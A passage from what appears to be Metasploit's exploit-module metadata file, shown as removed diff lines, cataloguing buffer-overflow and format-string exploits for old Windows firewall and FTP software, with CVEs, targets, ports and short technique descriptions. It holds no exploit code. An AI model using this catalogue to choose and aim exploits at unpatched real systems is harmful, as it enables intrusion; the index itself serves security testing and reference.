"/modules/exploits/windows/firewall/blackice_pam_icq.rb", - "is_install_path": true, - "ref_name": "windows/firewall/blackice_pam_icq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/firewall/kerio_auth": { - "name": "Kerio Firewall 2.1.4 Authentication Packet Overflow", - "fullname": "exploit/windows/firewall/kerio_auth", - "aliases": [], - "rank": 200, - "disclosure_date": "2003-04-28", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Kerio Personal Firewall\n administration authentication process. This module has only been tested\n against Kerio Personal Firewall 2 (2.1.4).", - "references": [ - "CVE-2003-0220", - "OSVDB-6294", - "BID-7180" - ], - "platform": "Windows", - "arch": "", - "rport": 44334, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro SP4 English", - "Windows XP Pro SP0 English", - "Windows XP Pro SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/firewall/kerio_auth.rb", - "is_install_path": true, - "ref_name": "windows/firewall/kerio_auth", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/32bitftp_list_reply": { - "name": "32bit FTP Client Stack Buffer Overflow ", - "fullname": "exploit/windows/ftp/32bitftp_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "fancy", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in 32bit ftp client, triggered when trying to\n download a file that has an overly long filename.", - "references": [ - "OSVDB-68703", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - 
"rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/32bitftp_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/32bitftp_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/3cdaemon_ftp_user": { - "name": "3Com 3CDaemon 2.0 FTP Username Overflow", - "fullname": "exploit/windows/ftp/3cdaemon_ftp_user", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-01-04", - "type": "exploit", - "author": [ - "hdm ", - "otr" - ], - "description": "This module exploits a vulnerability in the 3Com 3CDaemon\n FTP service. This package is being distributed from the 3Com\n web site and is recommended in numerous support documents.\n This module uses the USER command to trigger the overflow.", - "references": [ - "CVE-2005-0277", - "OSVDB-12810", - "OSVDB-12811", - "BID-12155" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Automatic", - "Windows 2000 English", - "Windows XP English SP0/SP1", - "Windows NT 4.0 SP4/SP5/SP6", - "Windows 2000 Pro SP4 French", - "Windows XP English SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb", - "is_install_path": true, - "ref_name": "windows/ftp/3cdaemon_ftp_user", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/aasync_list_reply": { - "name": "AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)", - "fullname": "exploit/windows/ftp/aasync_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "corelanc0d3r " - ], - 
"description": "This module exploits a stack buffer overflow in AASync v2.2.1.0, triggered when\n processing the response on a LIST command. During the overflow, a structured exception\n handler record gets overwritten.", - "references": [ - "OSVDB-68701", - "EDB-16738", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "XP SP3 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/aasync_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/aasync_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ability_server_stor": { - "name": "Ability Server 2.34 STOR Command Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/ability_server_stor", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-10-22", - "type": "exploit", - "author": [ - "muts", - "Dark Eagle", - "Peter Osterberg" - ], - "description": "This module exploits a stack-based buffer overflow in Ability Server 2.34.\n Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands,\n which leads to a stack based buffer overflow. This plugin uses the 'STOR' command.\n\n The vulnerability has been confirmed on version 2.34 and has also been reported\n in version 2.25 and 2.32. 
Other versions may also be affected.", - "references": [ - "CVE-2004-1626", - "OSVDB-11030", - "EDB-588" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Automatic", - "Windows XP SP2 ENG", - "Windows XP SP3 ENG" - ], - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/exploits/windows/ftp/ability_server_stor.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ability_server_stor", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/absolute_ftp_list_bof": { - "name": "AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow", - "fullname": "exploit/windows/ftp/absolute_ftp_list_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-11-09", - "type": "exploit", - "author": [ - "Node" - ], - "description": "This module exploits VanDyke Software AbsoluteFTP by overflowing\n a filename buffer related to the LIST command.", - "references": [ - "CVE-2011-5164", - "OSVDB-77105", - "EDB-18102" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/absolute_ftp_list_bof.rb", - "is_install_path": true, - "ref_name": "windows/ftp/absolute_ftp_list_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ayukov_nftp": { - "name": "Ayukov NFTP FTP Client Buffer Overflow", - "fullname": "exploit/windows/ftp/ayukov_nftp", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-10-21", - "type": "exploit", - "author": [ - "Berk Cem Goksel", - "Daniel Teixeira", - "sinn3r " - ], - 
"description": "This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP\n Client 2.0 and earlier. By responding with a long string of data for the SYST request, it\n is possible to cause a denail-of-service condition on the FTP client, or arbitrary remote\n code exeuction under the context of the user if successfully exploited.", - "references": [ - "CVE-2017-15222", - "EDB-43025" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Pro SP3 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/ayukov_nftp.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ayukov_nftp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/bison_ftp_bof": { - "name": "BisonWare BisonFTP Server Buffer Overflow", - "fullname": "exploit/windows/ftp/bison_ftp_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-08-07", - "type": "exploit", - "author": [ - "localh0t", - "veerendragg ", - "Jay Turla" - ], - "description": "BisonWare BisonFTP Server 3.5 is prone to an overflow condition.\n This module exploits a buffer overflow vulnerability in the said\n application.", - "references": [ - "CVE-1999-1510", - "BID-49109", - "EDB-17649", - "URL-http://secpod.org/msf/bison_server_bof.rb" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Bisonware FTP Server / Windows XP SP3 EN" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/bison_ftp_bof.rb", - "is_install_path": true, - "ref_name": "windows/ftp/bison_ftp_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
"exploit_windows/ftp/cesarftp_mkd": { - "name": "Cesar FTP 0.99g MKD Command Buffer Overflow", - "fullname": "exploit/windows/ftp/cesarftp_mkd", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-06-12", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.\n\n You must have valid credentials to trigger this vulnerability. Also, you\n only get one chance, so choose your target carefully.", - "references": [ - "CVE-2006-2961", - "OSVDB-26364", - "BID-18586", - "URL-http://web.archive.org/web/20060619195555/http://secunia.com:80/advisories/20574/" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 2000 Pro SP4 English", - "Windows 2000 Pro SP4 French", - "Windows XP SP2/SP3 English", - "Windows 2003 SP1 English" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/ftp/cesarftp_mkd.rb", - "is_install_path": true, - "ref_name": "windows/ftp/cesarftp_mkd", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/comsnd_ftpd_fmtstr": { - "name": "ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability", - "fullname": "exploit/windows/ftp/comsnd_ftpd_fmtstr", - "aliases": [], - "rank": 400, - "disclosure_date": "2012-06-08", - "type": "exploit", - "author": [ - "ChaoYi Huang ", - "rick2600 ", - "mr_me ", - "corelanc0d3r " - ], - "description": "This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially\n crafted format string specifier as a username. The crafted username is sent to the server to\n overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. 
Once this function pointer\n is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.\n The SEH exit function is preferred so that the administrators are not left with an unhandled\n exception message. When using the meterpreter payload, the process will never die, allowing\n for continuous exploitation.", - "references": [ - "OSVDB-82798", - "EDB-19024" - ], - "platform": "Windows", - "arch": "x86", - "rport": 21, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP SP3 - English", - "Windows Server 2003 - English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb", - "is_install_path": true, - "ref_name": "windows/ftp/comsnd_ftpd_fmtstr", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/dreamftp_format": { - "name": "BolinTech Dream FTP Server 1.02 Format String", - "fullname": "exploit/windows/ftp/dreamftp_format", - "aliases": [], - "rank": 400, - "disclosure_date": "2004-03-03", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a format string overflow in the BolinTech\n Dream FTP Server version 1.02. 
Based on the exploit by SkyLined.", - "references": [ - "CVE-2004-2074", - "OSVDB-4986", - "BID-9800", - "EDB-823" - ], - "platform": "Windows", - "arch": "x86", - "rport": 21, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Dream FTP Server v1.02 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/dreamftp_format.rb", - "is_install_path": true, - "ref_name": "windows/ftp/dreamftp_format", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/easyfilesharing_pass": { - "name": "Easy File Sharing FTP Server 2.0 PASS Overflow", - "fullname": "exploit/windows/ftp/easyfilesharing_pass", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-07-31", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the Easy File Sharing 2.0\n service. By sending an overly long password, an attacker can execute\n arbitrary code.", - "references": [ - "CVE-2006-3952", - "OSVDB-27646", - "BID-19243" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 2000 Pro English ALL", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/easyfilesharing_pass.rb", - "is_install_path": true, - "ref_name": "windows/ftp/easyfilesharing_pass", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/easyftp_cwd_fixret": { - "name": "EasyFTP Server CWD Command Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/easyftp_cwd_fixret", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-02-16", - "type": "exploit", - "author": [ - "Paul Makowski ", - "jduck " - ], - 
"description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which\n leads to a stack based buffer overflow. EasyFTP allows anonymous access by\n default; valid credentials are typically unnecessary to exploit this vulnerability.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n This exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n 'fixing' the return address post-exploitation. See references for more information.", - "references": [ - "OSVDB-62134", - "BID-38262", - "URL-http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/", - "URL-http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit", - "URL-https://seclists.org/bugtraq/2010/Feb/202" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows Universal - v1.7.0.2", - "Windows Universal - v1.7.0.3", - "Windows Universal - v1.7.0.4", - "Windows Universal - v1.7.0.5", - "Windows Universal - v1.7.0.6", - "Windows Universal - v1.7.0.7", - "Windows Universal - v1.7.0.8", - "Windows Universal - v1.7.0.9", - "Windows Universal - v1.7.0.10", - "Windows Universal - v1.7.0.11" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/easyftp_cwd_fixret.rb", - "is_install_path": true, - "ref_name": "windows/ftp/easyftp_cwd_fixret", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/easyftp_list_fixret": { - "name": "EasyFTP Server LIST Command Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/easyftp_list_fixret", - "aliases": [], - "rank": 500, - 
"disclosure_date": "2010-07-05", - "type": "exploit", - "author": [ - "Karn Ganeshan ", - "MFR", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11.\n credit goes to Karn Ganeshan.\n\n NOTE: Although, this is likely to exploit the same vulnerability as the\n 'easyftp_cwd_fixret' exploit, it uses a slightly different vector.", - "references": [ - "OSVDB-62134", - "EDB-14400", - "EDB-14451" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows XP SP3 - Version 2002" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/easyftp_list_fixret.rb", - "is_install_path": true, - "ref_name": "windows/ftp/easyftp_list_fixret", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/easyftp_mkd_fixret": { - "name": "EasyFTP Server MKD Command Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/easyftp_mkd_fixret", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-04-04", - "type": "exploit", - "author": [ - "x90c ", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which\n leads to a stack based buffer overflow.\n\n NOTE: EasyFTP allows anonymous access by default. However, in order to access the\n 'MKD' command, you must have access to an account that can create directories.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n This exploit utilizes a small piece of code that I\\'ve referred to as 'fixRet'.\n This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by\n 'fixing' the return address post-exploitation. 
See references for more information.", - "references": [ - "OSVDB-62134", - "EDB-12044", - "EDB-14399" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows Universal - v1.7.0.2", - "Windows Universal - v1.7.0.3", - "Windows Universal - v1.7.0.4", - "Windows Universal - v1.7.0.5", - "Windows Universal - v1.7.0.6", - "Windows Universal - v1.7.0.7", - "Windows Universal - v1.7.0.8", - "Windows Universal - v1.7.0.9", - "Windows Universal - v1.7.0.10", - "Windows Universal - v1.7.0.11" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/easyftp_mkd_fixret.rb", - "is_install_path": true, - "ref_name": "windows/ftp/easyftp_mkd_fixret", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/filecopa_list_overflow": { - "name": "FileCopa FTP Server Pre 18 Jul Version", - "fullname": "exploit/windows/ftp/filecopa_list_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-07-19", - "type": "exploit", - "author": [ - "Jacopo Cervini" - ], - "description": "This module exploits the buffer overflow found in the LIST command\n in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch", - "references": [ - "CVE-2006-3726", - "OSVDB-27389", - "BID-19065" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Windows 2k Server SP4 English", - "Windows XP Pro SP2 Italian" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/filecopa_list_overflow.rb", - "is_install_path": true, - "ref_name": "windows/ftp/filecopa_list_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": 
null - }, - "exploit_windows/ftp/filewrangler_list_reply": { - "name": "FileWrangler 5.30 Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/filewrangler_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "nullthreat", - "corelanc0d3r " - ], - "description": "This module exploits a buffer overflow in the FileWrangler client\n that is triggered when the client connects to a FTP server and lists\n the directory contents, containing an overly long directory name.", - "references": [ - "OSVDB-94555", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/filewrangler_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/filewrangler_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/freefloatftp_user": { - "name": "Free Float FTP Server USER Command Buffer Overflow", - "fullname": "exploit/windows/ftp/freefloatftp_user", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-06-12", - "type": "exploit", - "author": [ - "D35m0nd142", - "Doug Prostko " - ], - "description": "Freefloat FTP Server is prone to an overflow condition. It\n fails to properly sanitize user-supplied input resulting in a\n stack-based buffer overflow. 
With a specially crafted 'USER'\n command, a remote attacker can potentially have an unspecified\n impact.", - "references": [ - "OSVDB-69621", - "EDB-23243" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "FreeFloat / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/freefloatftp_user.rb", - "is_install_path": true, - "ref_name": "windows/ftp/freefloatftp_user", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/freefloatftp_wbem": { - "name": "FreeFloat FTP Server Arbitrary File Upload", - "fullname": "exploit/windows/ftp/freefloatftp_wbem", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-12-07", - "type": "exploit", - "author": [ - "sinn3r ", - "juan vazquez " - ], - "description": "This module abuses multiple issues in FreeFloat: 1. No credential is actually\n needed to login; 2. User's default path is in C:\\, and this cannot be changed;\n 3. User can write to anywhere on the server's file system. 
As a result of these\n poor implementations, a malicious user can just log in and then upload files,\n and let WMI (Management Instrumentation service) to execute the payload uploaded.", - "references": [ - "OSVDB-88302", - "OSVDB-88303" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "FreeFloat" - ], - "mod_time": "2021-02-18 09:18:19 +0000", - "path": "/modules/exploits/windows/ftp/freefloatftp_wbem.rb", - "is_install_path": true, - "ref_name": "windows/ftp/freefloatftp_wbem", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/ftp/freeftpd_pass": { - "name": "freeFTPd PASS Command Buffer Overflow", - "fullname": "exploit/windows/ftp/freeftpd_pass", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-08-20", - "type": "exploit", - "author": [ - "Wireghoul", - "TecR0c " - ], - "description": "freeFTPd 1.0.10 and below contains an overflow condition that is triggered as\n user-supplied input is not properly validated when handling a specially crafted\n PASS command. 
This may allow a remote attacker to cause a buffer overflow,\n resulting in a denial of service or allow the execution of arbitrary code.\n\n freeFTPd must have an account set to authorization anonymous user account.", - "references": [ - "OSVDB-96517", - "EDB-27747", - "BID-61905" - ], - "platform": "Windows", - "arch": "x86", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "freeFTPd 1.0.10 and below on Windows Desktop Version" - ], - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/exploits/windows/ftp/freeftpd_pass.rb", - "is_install_path": true, - "ref_name": "windows/ftp/freeftpd_pass", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/freeftpd_user": { - "name": "freeFTPd 1.0 Username Overflow", - "fullname": "exploit/windows/ftp/freeftpd_user", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-11-16", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the freeFTPd\n multi-protocol file transfer service. 
This flaw can only be\n exploited when logging has been enabled (non-default).", - "references": [ - "CVE-2005-3683", - "OSVDB-20909", - "BID-15457" - ], - "platform": "Windows", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": [ - "Automatic", - "Windows 2000 English ALL", - "Windows XP Pro SP0/SP1 English", - "Windows NT SP5/SP6a English", - "Windows 2003 Server English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/freeftpd_user.rb", - "is_install_path": true, - "ref_name": "windows/ftp/freeftpd_user", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ftpgetter_pwd_reply": { - "name": "FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)", - "fullname": "exploit/windows/ftp/ftpgetter_pwd_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "ekse", - "corelanc0d3r " - ], - "description": "This module exploits a buffer overflow in FTPGetter Standard v3.55.0.05 ftp client.\n When processing the response on a PWD command, a stack based buffer overflow occurs.\n This leads to arbitrary code execution when a structured exception handler gets\n overwritten.", - "references": [ - "OSVDB-68638", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "XP SP3 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ftpgetter_pwd_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - 
"exploit_windows/ftp/ftppad_list_reply": { - "name": "FTPPad 1.2.0 Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/ftppad_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "corelanc0d3r" - ], - "description": "This module exploits a stack buffer overflow FTPPad 1.2.0 ftp client. The overflow is\n triggered when the client connects to a FTP server which sends an overly long directory\n and filename in response to a LIST command.\n\n This will cause an access violation, and will eventually overwrite the saved extended\n instruction pointer. Payload can be found at EDX+5c and ESI+5c, so a little pivot/\n sniper was needed to make this one work.", - "references": [ - "OSVDB-68714", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "XP SP3 Professional, English - shlwapi 6.00.2900.5912", - "XP SP3 Professional, German - shlwapi 6.00.2900.5912", - "XP SP3 Professional, English - shlwapi 6.00.2900.5512" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/ftppad_list_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ftppad_list_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ftpshell51_pwd_reply": { - "name": "FTPShell 5.1 Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/ftpshell51_pwd_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets\n triggered when the ftp client tries to process an overly long response to a PWD\n command. 
This will overwrite the saved EIP and structured exception handler.", - "references": [ - "OSVDB-68639", - "URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ftpshell51_pwd_reply", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ftpshell_cli_bof": { - "name": "FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/ftpshell_cli_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-03-04", - "type": "exploit", - "author": [ - "r4wd3r", - "Daniel Teixeira" - ], - "description": "This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise\n edition) allowing remote code execution.", - "references": [ - "CVE-2018-7573", - "EDB-44596" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/ftp/ftpshell_cli_bof.rb", - "is_install_path": true, - "ref_name": "windows/ftp/ftpshell_cli_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/ftp/ftpsynch_list_reply": { - "name": "FTP Synchronizer Professional 4.0.73.274 Stack Buffer Overflow", - "fullname": "exploit/windows/ftp/ftpsynch_list_reply", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-10-12", - "type": "exploit", - "author": [ - "myne-us", - "corelanc0d3r " - ], - "description": "This 
